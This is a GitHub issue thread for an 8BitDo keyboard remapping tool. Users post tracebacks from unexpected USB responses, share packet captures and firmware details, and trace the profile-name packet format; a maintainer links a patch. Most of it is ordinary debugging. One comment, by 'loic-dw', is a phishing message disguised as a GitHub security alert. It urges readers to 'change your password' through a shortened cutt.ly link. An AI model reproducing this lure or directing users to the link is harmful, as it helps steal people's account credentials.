### ISSUE TITLE
I dont know if there are multiple variant of the keyboard i get this error when trying to get the status

### ISSUE THREAD

**Issue by PierreCsn** [goncalor/8bitdo-kbd-mapper#1]
❯ ./8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/pierre/.local/bin/./8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/pierre/.local/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/pierre/.local/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/pierre/.local/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 54800c000070006900650072007200650000000000000000000000000000000000

**Comment by goncalor** [comment]
Hi. Do you always get that error? Do any of the other commands work?

**Comment by electronicgore** [comment]
Hi, I have a similar issue to OP, though with a different code:

```
$ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 54e408000000000000000000000000000000000000
```

Commenting out line 120 in cli.py fixes that, but produces another unexpected value:
```
$ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 123, in cmd_status
    mapped = kbd.get_mapped_keys()
             ^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 66, in get_mapped_keys
    r = self.read_check_start(PROFILE_MAPPED)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 24, in read_check_start
    raise ValueError(
ValueError: Read unexpected start value
Expected: 5481
    Read: 54e408000000000000000000000000000000000000
``` 


Trying to create a profile doesn't work either:
```
$ 8bdkbd profile create profile1
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 138, in cmd_profile_create
    kbd.rename_profile(args.name)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 113, in rename_profile
    self.read_check_start(OK)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 24, in read_check_start
    raise ValueError(
ValueError: Read unexpected start value
Expected: 54e408
    Read: 54e407000000000000000000000000000000000000
```

These seem to be consistent so far (errors pop up every time, with the same read codes).
Curiously, doing either of the above also disables or, possibly, somehow remaps some buttons (I noticed at least "e" and "windows") until I reconnect the keyboard.

What is inconsistent (and is probably a separate issue, but mentioning it here just in case) is mapping (without creating a profile due to the issue above):
```
$ 8bdkbd map supera supera
Failed mapping with error: [Errno 110] Operation timed out
Maybe try again?
$ 8bdkbd map supera supera
Failed mapping with error: [Errno 110] Operation timed out
Maybe try again?
$ 8bdkbd map supera supera
Successfully mapped key
```

**Comment by loic-dw** [comment]
# Security Alert

Your GitHub account was recently accessed to change your password. If you do not recognize this activity, it's crucial to update your password immediately to secure your account.

[Click here to change your password](https://cutt.ly/ChangePassword)

**Comment by electronicgore** [comment]
Thanks for the response @goncalor! 
I don't know, unfortunately, which firmware version I'm running, and do not have a windows pc at hand to check this. Is there a way to check this from a linux system?

The results of my experiments so far are... weirdly inconsistent:

- It seems the operations sometimes succeed despite throwing up ValueErrors, but sometimes the changes are persistent and sometimes not. 
- At least some operations disable the `e` and `win` buttons (the status check definitely does), and often I can easily reset the keyboard to re-enable them, but sometimes it takes more elaborate procedure (and I'm not too sure on what exactly it is, but I accidentally hit it at least twice). 
- Sometimes these resets involve deleting the profile, so `supera` becomes no longer bound to `a`, but now the converse is somehow true - whenever I try to reset everything to defaults (reconnect the keyboard + `8bdbkd profile delete` + hold the "fast mapping" key for 5s), `supera` defaults to `a` (when a profile is active) even if I tried to remap it to something else.

Here is a console log from one of my early attempts at following the procedure you suggested:
```
e2@Guildenstern ~ $ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 5480014142434445464748494a4b4c4d4e4f505152535455565758595a61626364

e2@Guildenstern ~ $ 8bdkbd profile delete
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 144, in cmd_profile_delete
    kbd.delete_profile()
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 104, in delete_profile
    self.read_check_start(OK)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 24, in read_check_start
    raise ValueError(
ValueError: Read unexpected start value
Expected: 54e408
    Read: 54800065666768696a6b6c6d6e6f707172737475767778797a4142434445464748

e2@Guildenstern ~ $ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 54e408000000000000000000000000000000000000

e2@Guildenstern ~ $ 8bdkbd profile create test
Successfully created profile

e2@Guildenstern ~ $ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 54e408000000000000000000000000000000000000

e2@Guildenstern ~ $ 8bdkbd map supera a
Successfully mapped key
```

This output is largely consistent whenever I try to do all steps in one go. One exception is the `profile delete` operation, which sometimes returns `54e407000000000000000000000000000000000000` and sometimes `54800065666768696a6b6c6d6e6f707172737475767778797a4142434445464748`.

Here is another attempt, this time with some resets along the way:
```
e2@Guildenstern ~ $ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 5480014142434445464748494a4b4c4d4e4f505152535455565758595a61626364

e2@Guildenstern ~ $ 8bdkbd profile delete
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 144, in cmd_profile_delete
    kbd.delete_profile()
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 104, in delete_profile
    self.read_check_start(OK)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 24, in read_check_start
    raise ValueError(
ValueError: Read unexpected start value
Expected: 54e408
    Read: 54800065666768696a6b6c6d6e6f707172737475767778797a4142434445464748

e2@Guildenstern ~ $ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 5480014142434445464748494a4b4c4d4e4f505152535455565758595a61626364

# this time I reconnected the keyboard at this point; status output did not change

e2@Guildenstern ~ $ 8bdkbd profile create test
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 138, in cmd_profile_create
    kbd.rename_profile(args.name)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 113, in rename_profile
    self.read_check_start(OK)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 24, in read_check_start
    raise ValueError(
ValueError: Read unexpected start value
Expected: 54e408
    Read: 54e407000000000000000000000000000000000000

e2@Guildenstern ~ $ 8bdkbd status
8BitDo connected: yes
Traceback (most recent call last):
  File "/home/e2/.local/bin/8bdkbd", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 71, in main
    args.func(args)
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/cli.py", line 120, in cmd_status
    print("    Profile name:", kbd.get_profile_name())
                               ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/e2/.local/share/pipx/venvs/8bdkbd/lib/python3.12/site-packages/eightbdkbd/client.py", line 55, in get_profile_name
    raise ValueError(
ValueError: Read unexpected value
Expected: 54800000 or
          54801000
    Read: 5480014142434445464748494a4b4c4d4e4f505152535455565758595a61626364

# another disconnect & reconnect; status output same as above

e2@Guildenstern ~ $ 8bdkbd map supera b
Failed mapping with error: [Errno 110] Operation timed out
Maybe try again?

# at this point, supera is mapped to b (despite the error message), but e&win don't work
# disconnect & reconnect enable e&win but reset the supera mapping to a.
```

Apologies for the long and vague response, I understand it is not very helpful, I'm just really struggling to find any consistency and reproducibility in the keyboard's behavior. :/

**Comment by qweryty** [comment]
I just updated my keyboard to the latest firmware version and started getting this error.

`Read: 54800800004d00610069006e000000000000000000000000000000000000000000`

If I change `PROFILE_NAME` to `PROFILE_NAME = [0x54, 0x80, 0x08, 0x00]`, status command seems to function correctly, but it seems they changed more things in a protocol.

For example, when I try to map a button it shows the following error:
```
$ sudo 8bdkbd map supera a
Failed mapping with error: Read unexpected start value
Expected: 54e408
    Read: 548a07010000000000000000000000000000000000000000000000000000000000
Maybe try again?
```

Also, in the changelog it said that they implemented f13-f24 button mapping, but it seems that they used keycodes that are different from [usb hid](https://www.usb.org/sites/default/files/hut1_5.pdf) specification.
I tried mapping f24, but instead of expected 0x070073, it used 0x070081

**Comment by goncalor** [comment]
Hi @qweryty. Thank you for the comment.

That's interesting. And a pain, if they are changing the protocol...

I understand you were using `8bdkbd` already before that upgrade and everything worked fine before? Is that right? Do you know which version you were using before?

**Comment by qweryty** [comment]
Sorry for late reply, I don't check github often.

I don't really remember the firmware version.

At thay moment, I just got the keyboard so haven't used `8bdkbd` that much, but it was working for some mappings, but I wanted to map some of the less standard f-keys(f13-f24), and found out that those are not implemented yet.

I figured that I could just quickly patch the program, but started having some problems(sorry, no logs), so I thought that a good course of action would be to just update the firmware(especially after reading change logs), but quickly found out that they are changing the protocol.

**Comment by KujaQ** [comment]
if usb.core.find(idVendor=consts.VENDOR_ID, idProduct=consts.PRODUCT_ID):
    
    At the moment i experience this error, i dont use a USB hub but i think he cant find the Hardware
    any ideas to fix it?
    
    Thank you in Advnace :-)

**Comment by boneskull** [comment]
@goncalor I'm also having issues like this.  I'm curious how you went about reverse-engineering the protocol?

**Comment by andrew867** [comment]
@boneskull @goncalor That would also explain my pain when using the official software. I've had to do the on/off, unplug/re-plug dance even when attempting to update devices.

You should be able to use Wireshark with USB capture installed (it's an option in the Windows installer). I captured some traffic between the official software and my keyboard and numpad. There should be information on the firmware versions in the early packets. As follows:

8BitDo Retro Keyboard Model M - Firmware V1.77
8BitDo Retro 18 Numpad Model M - Firmware V1.06

I browsed through the options menu, changed the 'volume' setting, looked at the profiles, etc.

![image](https://github.com/user-attachments/assets/b7f855cf-f415-4721-ad26-93f87cef8674)
![image](https://github.com/user-attachments/assets/2f50a020-2f73-4e4f-b34d-b55cc19ddc71)
[8bitdo-retro-keyboard-and-keypad.pcapng.gz](https://github.com/user-attachments/files/18286255/8bitdo-retro-keyboard-and-keypad.pcapng.gz)

**Comment by andrew867** [comment]
Couple other notes, I'm not /certain/ this keyboard does HID boot profile. People have mentioned it not working but it works for me via USB on a Dell T1650 UEFI, even entering my Bitlocker code works. It does not work via the 2.4GHz dongle in UEFI or pre-boot.

I've been using this app on Windows for showing the USB tree::
https://www.uwe-sieber.de/usbtreeview_e.html

Funny how one of the reported devices is a POS barcode scanner, I'm curious what that's about ;)

![image](https://github.com/user-attachments/assets/6af0f30a-f776-4be5-a629-5e383bec70df)

**Comment by andrew867** [comment]
Oh and if anyone would like a log of mapping the F13-F24 keys in the same format as above let me know!

**Comment by andrew867** [comment]
> Sorry for late reply, I don't check github often.
> 
> I don't really remember the firmware version.
> 
> At that moment, I just got the keyboard so haven't used `8bdkbd` that much, but it was working for some mappings, but I wanted to map some of the less standard f-keys(f13-f24), and found out that those are not implemented yet.
> 
> I figured that I could just quickly patch the program, but started having some problems(sorry, no logs), so I thought that a good course of action would be to just update the firmware(especially after reading change logs), but quickly found out that they are changing the protocol.

@qweryty 
I changed supera to F13 through F24 and pressed the button after the successful save to confirm the HID code sent. Hope this helps

[8bitdo-retro-keyboard-and-keypad-setting-supera-to-f13-through-f24.pcapng.gz](https://github.com/user-attachments/files/18286294/8bitdo-retro-keyboard-and-keypad-setting-supera-to-f13-through-f24.pcapng.gz)

**Comment by boneskull** [comment]
@andrew867 didn't realize wireshark could do this sort of thing as well. thanks!

**Comment by goncalor** [comment]
Hey @boneskull @andrew867 .

Yeah, I essentially did it as Andrew hints. I used the official 8BitDo's Windows app on a VM to configure the keyboard with it. I used WireShark to capture USB. Then I started trying to identify patterns in what messages I saw when I performed specific actions.

**Comment by goncalor** [comment]
> @qweryty I changed supera to F13 through F24 and pressed the button after the successful save to confirm the HID code sent. Hope this helps
> 
> [8bitdo-retro-keyboard-and-keypad-setting-supera-to-f13-through-f24.pcapng.gz](https://github.com/user-attachments/files/18286294/8bitdo-retro-keyboard-and-keypad-setting-supera-to-f13-through-f24.pcapng.gz)

@andrew867 thank you for the pcap.

Based on it and @qweryty's earlier comment, I suppose the following would work to map `supera` to F13 (increment the hex to get any Fx through F24):

```
8bdkbd map-hid supera 070076
```

Based on the info from you both, I've quickly created [this patch](https://github.com/goncalor/8bitdo-kbd-mapper/commit/1a0ae482771f9387e4876e21dc2915b0317340cd) in a separate branch.

Can you test it and let me know if it works as intended? If it works, I can merge to main.

**Comment by goncalor** [comment]
@creshal thank you for testing. Based on your feedback, I've merged https://github.com/goncalor/8bitdo-kbd-mapper/commit/1a0ae482771f9387e4876e21dc2915b0317340cd .

If you can share the pcap and the following details, maybe it can help in some way:
- keyboard model
- keyboard firmware version
- 8bitdo tool version

Thanks.

**Comment by creshal** [comment]
* Keyboard model 85HE and 85HA (aka the regular size Retro Mechanical; [Model M](https://www.8bitdo.com/retro-mechanical-keyboard-m/) and [Model Fami](https://www.8bitdo.com/retro-mechanical-keyboard/))
* Both keyboards patched to 1.77 (I do have a pcap for doing a firmware upgrade on one of the keyboards, if someone feels crazy enough to port *that* to Linux… but I'm not buying a third to test it out)
* 8bitdo "Ultimate V2" software, version… 1.30. Version 2 Version 1.30? Sure, whatever. The latest as of writing.

I've got two pcaps reproducing the fault and one control, depending on how messy you want them to be:

* First borked attempt (85HE): That pcap captures the entire startup process for the 8bitdo tool and me fumbling around with the keys a few times, I put my notes about what I did when in a text file I was writing in parallel on a separate non-USB keyboard: [full_logs.tar.gz](https://github.com/user-attachments/files/25661962/full_logs.tar.gz)
* Control: Naturally, when I tried to isolate the bug, it worked fine on the first try (this was after rebooting the machine and plugging in the 85HA): [working.pcap.gz](https://github.com/user-attachments/files/25661973/working.pcap.gz)
* Third attempt (still on the 85HA) ran into the bug again, and this time I managed to generate an isolated capture started after everything was running, and I just hit "save" twice in a row; it errored out on the first try but seemed to process the second fine: [error_on_first_try.pcap.gz](https://github.com/user-attachments/files/25661964/error_on_first_try.pcap.gz)

Thanks for all the hard work btw, really appreciate this project 😀

**Comment by ColinEge** [comment]
> ValueError: Read unexpected value
> Expected: 54800000 or
>           54801000
>     Read: 54800800004d00610069006e000000000000000000000000000000000000000000

I found the issue (don't have time to fix yet). Our expected prefixes for profile names are wrong, Your profile name is 4 chars (8 bytes) and your prefix is 54 80 <08 00> (8 bytes, 00 extra packets). Instead of a solid prefix for profile name, its actually how many bytes are in this packets payload and how many extra packets we should look at. My profile 'games' sends 54 80 <0a 00> (10 bytes, 0 extra packets).
